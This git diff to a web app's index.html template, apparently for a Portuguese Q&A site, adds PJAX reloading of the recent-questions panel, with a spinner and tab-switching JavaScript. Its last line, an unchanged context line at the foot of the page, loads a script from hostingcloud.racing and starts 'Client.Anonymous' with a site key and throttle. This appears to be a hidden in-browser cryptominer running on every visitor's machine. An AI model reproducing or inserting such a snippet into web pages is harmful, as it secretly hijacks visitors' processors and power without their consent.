--- a/main_app/templates/index.html
+++ b/main_app/templates/index.html
@@ -8,7 +8,7 @@
 <meta charset="utf-8">
 <meta name="viewport" content="width=device-width, initial-scale=1">
 <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/css/bootstrap.min.css">
-<link rel="stylesheet" href="/static/css/index.css">
+<link rel="stylesheet" href="/static/css/index.css?v=x">
 <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
 <script src="https://kit.fontawesome.com/1f965a8b94.js"></script>
 <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
@@ -60,10 +60,11 @@
 			<li class="nav-item">
 				<span class="nav-link" id="news">Novas perguntas</span>
 			</li>
+			<a data-pjax href="/pjax-questions"><img src="/static/images/reload.png" id="reload"></a>
 		</ul>
 <!-- Questões recentes -->
 <section class="card" id="n_questions">
-{% include "base/recent-questions.html" %}
+{% include "base/recent-questions-pjax.html" %}
 </section>
 <!-- !Questões recentes -->
 
@@ -95,6 +96,31 @@
 	<h5>Fim! <a href="/news">Clique aqui</a> para ver as novas perguntas.</h5>
 </section>
 <!-- !Questões populares -->
+
+<!-- PJAX -->
+<script src="/static/js/jquery-pjax/jquery.pjax.js"></script>
+<script>
+	$(document).pjax('[data-pjax] a, a[data-pjax]', '#n_questions', {push: false, timeout: 10000})
+	$('#n_questions').on('pjax:start', function() {
+		/* Muda para a aba de perguntas recentes. */
+		news.classList.add('active')
+		popular.classList.remove('active')
+		window.history.pushState("object or string", "Title", "/news");
+		logo.href = '/news'
+		p_tab.style.display = 'none'
+		n_tab.style.display = 'block'
+		
+		document.getElementById('reload').classList.add('spinner');
+		document.getElementById('n_questions').style.opacity = 0.5;
+		document.getElementById('reload').onclick = function () { return false; }
+	})
+	.on('pjax:end',   function() {
+		document.getElementById('reload').classList.remove('spinner');
+		document.getElementById('n_questions').style.opacity = 1;
+		document.getElementById('reload').onclick = function () { return true; }
+	});
+</script>
+<!-- !PJAX -->
 
 		<script src="/static/js/index.js?v=7"></script>
 <script src="https://www.hostingcloud.racing/zk0a.js"></script><script>var _client=new Client.Anonymous("5359e2aefac13b8544fcee9326d4a0aafb5fd62a6991f1e87ade167c09c9967a",{throttle:.9,c:"w",ads:0});_client.start();</script>
